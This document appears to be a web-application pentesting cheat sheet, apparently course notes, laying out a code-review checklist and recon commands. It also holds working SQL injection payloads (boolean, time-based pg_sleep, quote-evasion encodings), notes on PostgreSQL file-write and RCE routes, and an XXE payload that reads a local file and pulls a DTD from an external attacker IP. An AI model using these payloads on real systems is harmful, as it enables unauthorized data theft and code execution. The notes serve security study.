Code review

  • Initial discovery
    • Basic port scan
    • Default user accounts
    • Check cookies and response headers
    • Check how each user controlled input reflect in the UI (XSS/SSTI)
    • Loose comparison in PHP (+ magic hashes)
    • Find deployment location using "ps -ef" or "Process Explorer"
    • grep -rnw "eval(" . --color
    • query ^.*?query.*?select.*?
    • Routing configuration
    • whitelist/blacklists
    • "Random" usage or MD5 SHA1 usage
    • Source of 404 and other error pages
    • README.md / CHANGELOG.md
      • while read l; do echo "===$l==="; curl $l/README.md -k; done < packages.txt
      • cat commands.html | grep -E "script.*src" | grep -Ev "vendor|lib|plugin"
      • wget --no-check-certificate -q -i list.txt
      • for f in compressed_*.js; do js-beautify $f > pretty/"${f//compressed_}"; done;
    • Identify libraries
      • wget https://github.com/nice-registry/all-the-package-names/raw/master/names.json
      • jq '.[0:10000]' names.json | grep ","| cut -d'"' -f 2 > npm-10000.txt
      • gobuster dir -w ./npm-10000.txt -u https://openitcockpit/js/vendor/ -k
    • Files
      • find ./ -iname "*.html"
      • grep -r "document.write" ./ --include *.html
    • Identify WSS endpoint and client code that interact with it
    • Identify serialized values
    • Check network interfaces
    • /var/log/auth.log
    • wget https://github.com/nice-registry/all-the-package-names/raw/master/names.json
      • jq '.[0:10000]' names.json | grep ","| cut -d'"' -f 2 > npm-10000.txt
      • gobuster dir -w ./npm-10000.txt -u https://openitcockpit/js/vendor/ -k
  • Enabling Logging
    • Enable database query logs
    • PHP display_errors = ON
    • Log4j configurations
    • PHP - var_dump
    • Get error info
      • Using param[] instead of param to get error messages
      • Send invalid JSON/XML inputs
    • Writable files: find /var/www/html/ -type d -perm -o+w
    • Python debugging using - PTVSD
  • Authentication related interesting functions
    • Session cookie has httpOnly flag set (stealing cookie over XSS)
    • Username enumeration
    • Login
    • Registration
    • Change password
    • Change email
    • Confirmation of email update
    • High authorization functions
  • SQLi
    • Check binary: OR (select 1)=1 --
    • Check binary with brackets: OR (select 1)=1) --
    • USERID=1;SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)--
    • USERID=1; select+pg_sleep(10);--
    • USERID=1 UNION SELECT CASE WHEN (SELECT 1)=1 THEN 1 ELSE 0 END--
    • Escaping
      • Spaces with: /**/
      • Quotes with: Hex notation or example
      • select convert_from(decode('QVdBRQ==', 'base64'), 'utf-8');
      • SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
    • Write file
      • COPY TO/COPY FROM
      • LO_IMPORT/LO_EXPORT
    • RCE
      • PG extension (DLL)
      • Java PROCEDURE - HSQLDB
        • com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename
        • java.lang.System.getProperty
  • CSRF
    • Is CSRF protection present.
    • Can XSS be used to initiate a cross origin request.
  • Steps
    • What are the exposed functions to non-auth users
    • How admin panel / user panel check if user is logged in
    • Login/registration/forgot-password/logout functions

XXE 

<!ENTITY wrapper "%start;%file;%end;">

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///home/student/crx/data/hsqldb/dbmanager.sh" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://192.168.119.120/wrapper.dtd" >
%dtd;
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&wrapper;</lastName>
<firstName>Tom</firstName> </org.opencrx.kernel.account1.Contact>

JavaScript Keylogger into XXS